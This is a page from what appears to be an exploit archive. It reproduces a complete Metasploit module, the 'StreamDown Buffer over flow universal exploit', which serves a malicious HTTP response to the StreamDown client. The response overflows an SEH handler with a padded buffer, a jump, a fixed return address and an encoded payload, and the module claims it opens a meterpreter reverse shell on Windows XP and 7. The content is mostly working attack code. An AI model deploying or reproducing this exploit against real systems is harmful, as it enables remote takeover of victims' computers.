扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 |
## # $Id: stream_down_BOF.rb 1 2011-12-18 $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer def initialize super( 'Name' => 'StreamDown Buffer over flow universal exploit', 'Version'=> '$Revision: 1 $', 'Description'=> 'Stream Down Buffer Overflow universal exploit tested against win xp sp3 and win7 sp1. Also note that the program will not crash in case of meterpreter reverse tcp payload but a session will be opened', 'Author' => 'Fady Mohamed Osman', 'References' => [ ['URL', 'http://www.dark-masters.tk/'] ], 'Privileged' => false, 'DefaultOptions' => { 'EXITFUNC' => 'seh', 'InitialAutoRunScript' => 'migrate -f' }, 'Payload'=> { 'BadChars' => "\x00\xff\x0a" }, 'Platform' => 'win', 'Targets'=> [ [ 'Automatic',{ } ], ], 'DefaultTarget' => 0, 'License'=> MSF_LICENSE ) end def on_request_uri(cli,request) seh = 0x10019448 nseh = "\xeb\x06\x90\x90" sploit = "A"*16388 + nseh + [seh].pack('V') + "\x90"*10 + payload.encoded cli.put(sploit) close_client(cli) end end |
体验盒子
